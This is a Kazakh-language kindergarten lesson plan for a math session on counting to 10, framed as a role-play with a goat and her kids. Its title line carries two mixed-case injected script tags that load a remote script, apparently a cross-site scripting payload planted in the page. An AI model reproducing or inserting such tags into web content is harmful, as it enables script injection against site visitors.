10 саны көлеміндегі сан мен цифр туралы ұғымдарын бекіту<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.11.2022
Ұйымдастырылған оқу іс-әрекетінің технологиялық картасы
Күні: 17.11.2022ж
Тәрбиеші: Хасенова А.У
Білім беру саласы: Таным
Бөлімі: Математика негіздері
Тақырыбы: 10 саны көлеміндегі сан мен цифр туралы ұғымдарын бекіту.
Мақсаты: 10 сан көлемінде садық есептеуге үйрету. Сандарды тура және кері санау. Балалардың тілін дамыту, іс-әрекет дағдыларын меңгерту,геометриялық пішіндер туралы ұғымдарын тиянақтап, түстерді ажырата білуге,тапқырлыққа, ізденімпаздыққа тәрбиелеу. Балалардың ұсақ қол маторикасын дамыту.
Әдіс тәсілдері: сұрақ-жауап,түсіндіру,ой қозғау,талдау-жинақтау.
Көрнекілік құралдар: Суреттер. пішіндер, таяшалар.
Анасы : Лақтарым, шырақтарым
Анаң келді өрістен
Сүт әкелді, шөп әкелді
- Балалар, ой бұл біздің анамыз ғой
- Анасы: Лақтарым, амансыңдарма.
- Балалар: ана
- Анасы: мен жоқта үйге ешкім келген жоқпа?
- Балалар: Жоқешкім келген жоқ
- Анасы: Лақтарым мен сендерге ренжулімін. Сендерді математика негізінен сабақтарығ нашарлап кеткендеріңді маған апайларың хабарлады. Сондықтан маған 7 түрлі тапсырма берді.
- Балалар: біз оны қалай орындаймыз? Білмимізғой?
- Балалар: а, мен таптым бізге балалабақшадағы балалар көмпектесетін шығар?
- Анасы: Жарайды олай болса менің балабақшада танысым бар еді соған хабарласып көрейін. Маған телефонды алып беріңдер?
- Анасы : Алло, Айбаршын Улықпанқызы сәлеметсізбе?
- Тәрбиеші: Сәлеметсізбе!
- Анасы: Айбаршын Улықпанқызы менің лақтарым математика оқу қызметінен нашарлап кетіпті , бізге сіздің көмегіңіз керек еді? Көмектесесізбе?
- Тәрбиеші : әрине әрқашан көмектесуге дайынбыз , балаларды жіберіңіз.
Анасы: рахмет. Балалар бізге балабақша қызметкерлері көмек көрсетуге дайын мен сендерге балабақшаға жол көрсетіп жіберейін. Қане , лақтарым жүре қойыңдар.
Балалар бүгінгі оқу қызметі ерекше болмақ.Себебі бүгін біздің оқу қызыметімізге көптеген тәрбиеші апайлар қонаққа келіп отыр.Апайларымыз бен достарымызбен, амандасып алайық
- Ал ,балалар бізге қонақтар келді қарсы алайық . бәріміз орнымыздан тұрып амандасайық қонақтармен.
Шаттық шеңбері:
Біздер жақсы баламыз
Өсті ақыл санамыз
Қонақтармен ең алғаш
Амандасып аламыз
Сәлеметсіздерме!
Ал енді оқу қызметімізді бастайық
Балалар қазір жылдың қай мезгілі?
Балалар: күз
Тәрбиеші: Балалар сендер күз айын атап беріздерші?
Балалар: Қыркүйек , қазан, қараша.
- Жарайсыңдар!
- Тәрбиеші: балалар балабақшаға сендер қай уақытта келесіңдер? Таңертен
- Қай уақытта кетесіңдер?
- Балалар: Кеште
- Тәрбиеші: дұрыс айтасыңдар балалар.
- Лақтар кіреді
- Аяулым: апай бұл лақтар нестеп жүр?
- Тәрбиеші: Балалар бұл лақтар сендерге көмекке келіпті. Көмектесемізбе?
- Балалар :иә
- Тәрбиеші : балалар отыра қойыңдар. Балалар лақтардың аналары бізге көп тапсырмалар беріп жіберіпті . біздер сол тапсырманы орындауымыз керек. Орындаймызба ?
- Балалар: орындаймыз
- Ал мына бірінші тапсырманы хаттың ішінде не тапсырма берілген екен? Балалар мына пішін қандай екен?
- Балалар мына ашық хаттың сыртында қандай геометриялық пішін екен?
- Балалар : Шаршы
- Тәрбиеші : Өте дұрыс. Түсі қандай ?
- Балалар: Көк
- Өте дұрыс
- 1 тапсырма 10 көлеміндегі сандарды тура және кері санау керек
- Балалар санайды
- Жарайсыңдар лақтардың бірінші тапсырмасы орындалды. Ал екінші ашық хатымыз қандай геометриялық пішінмен бейнеленген екен ?
2 тапсырма Ешкі мен лақтар нені жақсы көреді?
-Балалар: жемістер , көкөністер
-Тәрбиеші:
Жемістер мен көкөністерден өрнек құрастырып оны санды өрнекпен бейнелеп жазамыз. Алдымыздағы математикалық жолақшаға орнатуымыз керек.
3 тапсырма: Сергіту сәті
4 тапсырма: Балалар сендер білесіңдерме? Бізге лақтар қайдан келді?
-Балалар: орманнан
-Тәрбиеші: әрине орманнан келген екен
Енді ормандағы жануарларды мына суретке дұрыс орналастыруымыз қажет
Балалар біз кеңістікті бағдарлағанда мынадай белгілерді пайдаланамыз.
5 тапсырма: Есту қабілеттерін тексеру . Логикалық ойын.
6 тапсырма: балалар ермексаздың көмегімен таяқшалардан пішіндер жасау.
7 тапсырма: Адасқан сандар.
Тәрбиеші : балалар бүгін біз оқу қызметімізге кімдер келді? Біз оларға қандай көмек бердік?
Балалар: Лақтар
- Тәрбиеші: Жарайсыңдар. Оларға біздер көмектестікпе?
- Балалар : Иә, сандарды тура және кері санауды үйренді, логикалық есептер шығарды, оң солды ажырата білді.
- Тәрбиеші: Жарайсыңдар балалар .енді лақтар кеш түспей тұрғанда ормандарына уйіне жетіп алсын.
- Лақтар: сау болыңдар балалар.
- Балалар: сау болыңдар
Балалар біз лақтардың жеті тапсырмаларын орындап шықтық.
-Тәрбиеші : лақтар сендер тапсырмаларды дұрыс түсініп алдыңыздарма--Балалар: иә.
-Тәрбиеші: өз беттеріңмен енді тапсырманы орындай аласыздарма?
Балалар: иә . Сіздерге рахмет. Анамыз сендерге сыйлық беріп жіберді . Рахмет
Тәрбиеші : балалар сендерге лақтардың анасы сыйлықтар берген екен . ал енді лақтар кеш батпай тұрып орманға жетіп алсын сау болықдар лақтар.
-Балалар: Сау болыңыздар.